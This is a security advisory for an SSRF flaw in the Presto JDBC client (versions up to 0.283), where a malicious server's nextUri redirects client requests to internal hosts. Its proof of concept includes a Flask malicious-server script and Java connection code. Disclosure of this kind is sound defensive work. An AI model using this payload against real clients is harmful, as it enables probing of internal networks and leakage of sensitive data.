GHSA-86q5-qcjc-7pv4

Suggest an improvement
Source
https://github.com/advisories/GHSA-86q5-qcjc-7pv4
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-86q5-qcjc-7pv4/GHSA-86q5-qcjc-7pv4.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-86q5-qcjc-7pv4
Published
2023-10-03T21:54:06Z
Modified
2024-11-28T05:43:15.043731Z
Severity
  • 7.6 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L CVSS Calculator
Summary
Presto JDBC Server-Side Request Forgery by nextUri
Details

Summary

Presto JDBC is vulnerable to Server-Side Request Forgery (SSRF) when connecting a remote Presto server. An attacker can modify the nextUri parameter to internal server in response content that Presto JDBC client will request next and view sensitive information from highly sensitive internal servers or perform a local port scan.

Details

The Presto protocol has a nextUri parameter that specifies which URI the client will request next to obtain more query data. Presto JDBC will directly use the nextUri returned by the remote Presto server as the URL for the next request. So if a malicious server modify the nextUri parameter to the internal server, JDBC will request it and cause SSRF.

For unexpected responses, JDBC will put the response body into the error. So the response of the internal server will be leaked if the server also returns the error directly to the user.

The relevant code is in file path /presto-client/src/main/java/com/facebook/presto/client/StatementClientV1.java and function advance .

The flowchart is as follows:

<img src="https://s2.loli.net/2023/09/18/gvUZ2rT7w3Okbde.png" alt="presto_jdbc_ssrf_2.png" style="zoom:50%;" />

PoC

Running an HTTP service to route POST /v1/statement redirect to the intranet. For example, using these Python code:

from flask import Flask, Response

app = Flask(__name__)

@app.route('/v1/statement', methods=['POST'])
def next_uri_to_interal_server():
    data = '{"id":"test_id","infoUri":"whatever","nextUri":"http://127.0.0.1:8888","stats":{"state":"QUEUED","queued":true,"scheduled":false,"nodes":0,"totalSplits":0,"queuedSplits":0,"runningSplits":0,"completedSplits":0,"cpuTimeMillis":0,"wallTimeMillis":0,"queuedTimeMillis":0,"elapsedTimeMillis":0,"processedRows":0,"processedBytes":0,"peakMemoryBytes":0,"peakTotalMemoryBytes":0,"peakTaskTotalMemoryBytes":0,"spilledBytes":0},"warnings":[]}'
    return Response(data, content_type='application/json; charset=utf-8', status=200)

if __name__ == '__main__':
    app.run(host="0.0.0.0",port=8000)

Connecting to the malicious server using JDBC:

String url = "jdbc:presto://<ip>:<port>";
Properties properties = new Properties();
properties.setProperty("user", "root");
try {
    Connection connection = DriverManager.getConnection(url, properties);
    Statement stmt = connection.createStatement();
    ResultSet res = stmt.executeQuery("show catalogs");
    while(res.next()) {
        System.out.println(res.getString(1));
    }
} catch (Exception e) {
    e.printStackTrace();
}

Pwned!

Impact

When the target remote Presto server to be connected is controllable, an attacker can view sensitive information from highly sensitive internal servers or perform a local port scan.

Vulnerability Discovery Credit: Jianyu Li @ WuHeng Lab of ByteDance

Database specific
{
    "nvd_published_at": null,
    "cwe_ids": [
        "CWE-918"
    ],
    "severity": "HIGH",
    "github_reviewed": true,
    "github_reviewed_at": "2023-10-03T21:54:06Z"
}
References

Affected packages

Maven / com.facebook.presto:presto-jdbc

Package

Name
com.facebook.presto:presto-jdbc
View open source insights on deps.dev
Purl
pkg:maven/com.facebook.presto/presto-jdbc

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Last affected
0.283

Affected versions

0.*

0.52
0.53
0.54
0.55
0.56
0.57
0.58
0.59
0.60
0.61
0.62
0.63
0.64
0.65
0.66
0.67
0.68
0.69
0.70
0.71
0.72
0.73
0.74
0.75
0.76
0.77
0.78
0.79
0.80
0.81
0.82
0.83
0.84
0.85
0.86
0.87
0.88
0.89
0.90
0.91
0.92
0.93
0.94
0.95
0.96
0.97
0.98
0.99
0.100
0.101
0.102
0.103
0.104
0.105
0.106
0.107
0.108
0.109
0.110
0.111
0.112
0.113
0.114
0.115
0.116
0.117
0.118
0.119
0.120
0.121
0.122
0.123
0.124
0.125
0.126
0.127
0.128
0.129
0.130
0.131
0.132
0.133
0.134
0.135
0.136
0.137
0.138
0.139
0.140
0.141
0.142
0.143
0.144
0.144.1
0.144.2
0.144.3
0.144.4
0.144.5
0.144.6
0.144.7
0.144.8
0.145
0.146
0.147
0.148
0.149
0.150
0.151
0.152
0.152.1
0.152.2
0.152.3
0.153
0.154
0.155
0.156
0.157
0.157.1
0.158
0.159
0.160
0.161
0.162
0.163
0.164
0.165
0.166
0.167
0.168
0.169
0.170
0.171
0.172
0.173
0.174
0.175
0.176
0.177
0.178
0.179
0.180
0.181
0.182
0.183
0.184
0.185
0.186
0.187
0.188
0.189
0.190
0.191
0.192
0.193
0.194
0.195
0.196
0.197
0.198
0.199
0.200
0.201
0.202
0.203
0.204
0.205
0.206
0.207
0.208
0.209
0.210
0.211
0.212
0.213
0.214
0.215
0.216
0.217
0.218
0.219
0.220
0.221
0.222
0.223
0.223.1
0.224
0.225
0.226
0.227
0.228
0.229
0.230
0.231
0.231.1
0.232
0.233
0.233.1
0.234
0.234.1
0.234.2
0.234.3
0.235
0.235.1
0.236
0.236.1
0.237
0.237.1
0.237.2
0.238
0.238.1
0.238.2
0.239
0.239.1
0.239.2
0.239.3
0.240
0.240.1
0.241
0.242
0.242.1
0.243
0.243.1
0.243.2
0.243.3
0.243.4
0.244
0.244.1
0.245
0.245.1
0.246
0.247
0.248
0.248.1
0.249
0.249.1
0.250
0.251
0.251.1
0.252
0.253
0.253.1
0.254
0.254.1
0.255
0.256
0.257
0.258
0.259
0.259.1
0.260
0.260.1
0.261
0.262
0.263
0.263.1
0.264
0.264.1
0.265
0.265.1
0.266
0.266.1
0.267
0.268
0.269
0.270
0.271
0.271.1
0.272
0.272.1
0.273
0.273.1
0.273.2
0.273.3
0.273.4
0.274
0.275
0.276
0.276.1
0.276.2
0.277
0.278
0.278.1
0.279
0.280
0.281
0.282
0.283